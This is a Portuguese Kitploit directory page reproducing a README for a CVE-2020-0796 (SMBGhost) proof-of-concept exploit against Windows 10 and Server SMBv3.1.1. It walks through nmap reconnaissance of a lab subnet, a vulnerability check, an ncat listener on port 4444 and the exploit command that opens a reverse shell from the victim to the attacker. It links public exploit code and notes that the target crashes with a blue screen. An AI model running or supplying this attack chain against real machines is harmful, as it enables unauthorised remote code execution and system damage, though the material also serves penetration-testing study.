Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
POC-CVE-2020-0796 — Prova de conceito de exploit para CVE-2020-0796 (SMBGhost) direcionado ao Windows 10/Server SMBv3.1.1. Inclui reconhecimento com Nmap, varredura de vulnerabilidades e entrega de payload de reverse shell. | Kitploit
Ferramentas/GitHubGitHub/hungdnvp/poc-cve-2020-0796
ReconhecimentoAnálise de VulnerabilidadesExploraçãoSegurança de RedeTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubhungdnvp/poc-cve-2020-0796

POC-CVE-2020-0796

Prova de conceito de exploit para CVE-2020-0796 (SMBGhost) direcionado ao Windows 10/Server SMBv3.1.1. Inclui reconhecimento com Nmap, varredura de vulnerabilidades e entrega de payload de reverse shell.

Ver Repositório
2há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

**- Versões afetadas*

- Windows 10 Versão 1903 para sistemas de 32 bits

- Windows 10 Versão 1903 para sistemas baseados em ARM64

- Windows 10 Versão 1903 para sistemas baseados em x64

- Windows 10 Versão 1909 para sistemas de 32 bits

- Windows 10 Versão 1909 para sistemas baseados em ARM64

- Windows 10 Versão 1909 para sistemas baseados em x64

- Windows Server, versão 1903 (instalação Server Core)

- Windows Server, versão 1909 (instalação Server Core)

Diagrama de conexão do sistema

image-20240223154022321

Reconhecimento de alvo

Execute o Nmap para escanear a faixa de rede na zona DMZ

root@kitploit:~
map -sS 192.168.116.0/24

nmap: É o nome do programa de escaneamento de rede**.**

-sS: Seleciona o método de varredura TCP SYN scan. Nesta varredura, o Nmap envia um pacote SYN ao servidor de destino e observa a resposta. Se o servidor de destino responder com um pacote SYN-ACK, o Nmap sabe que a porta está aberta. Se o servidor de destino responder com um pacote RST, significa que a porta está fechada.

-192.168.116.0/24: O endereço IP ou a faixa de endereços IP específica que você deseja escanear. Neste caso, a faixa de endereços é 192.168.116.0/24, que descreve todos os endereços IP de 192.168.116.1 a 192.168.116.254.

image-scanNmap

=> Observa-se que o endereço IP da máquina vítima 192.116.145 está com a porta 445 aberta.

· Use o Nmap para escanear vulnerabilidades na máquina vítima

root@kitploit:~
map -p445 –script smb-protocols 192.168.116.145

nmap: É o nome do programa de escaneamento de rede.

-p445: Especifica a porta específica a ser escaneada, neste caso a porta 445. A porta 445 é frequentemente usada para comunicação com o serviço SMB (Server Message Block) em sistemas Windows.

--script smb-protocols: Seleciona o script (script) smb-protocols para realizar a varredura. Este script ajuda a verificar e exibir informações sobre as versões do protocolo SMB suportadas no servidor de destino.

192.168.116.145: O endereço IP do servidor que você deseja escanear. Neste caso, o endereço IP é configurado como 192.168.116.145.

image-sanNmap2

- O resultado obtido pelo smb-protocols indica que a máquina vítima pode ter a vulnerabilidade explorável SMBv3.1.1.

- Para ter mais certeza, continue verificando a possibilidade de exploração da vulnerabilidade CVE-2020-0796 executando o script python.

[]: -https://github.com/ly4k/SMBGhost "código de exploração"

image-nmapcheck

=> Resultado Vulnerable -> foi detectada a vulnerabilidade CVE 2020-0796 explorável na máquina vítima.

Explorar a vulnerabilidade, instalar malware, criar canal de controle remoto

**Executar ataque Reverse_shell**

  • Inicie a sessão com Netcat escutando a conexão da vítima*
root@kitploit:~
ncat -lvp 4444
  • Execute o script de exploração CVE-2020-0796

[]: https://github.com/jamf/CVE-2020-0796-RCE-POC "código de exploração"

root@kitploit:~
python SMBleedingGhost.py 192.168.116.145 192.168.44.3 4444

image-attack

=> RESULTADO: A máquina atacante assume a execução do shell code na máquina vítima.

image-result

Após a conexão bem-sucedida, o atacante pode explorar e executar código arbitrário na máquina vítima com os privilégios de User da sessão de conexão.

Ao finalizar a sessão, a máquina vítima sofre erro BlueScreen e reinicia automaticamente.

image-end

*A execução da exploração pode danificar o sistema alvo*

Baixar ferramenta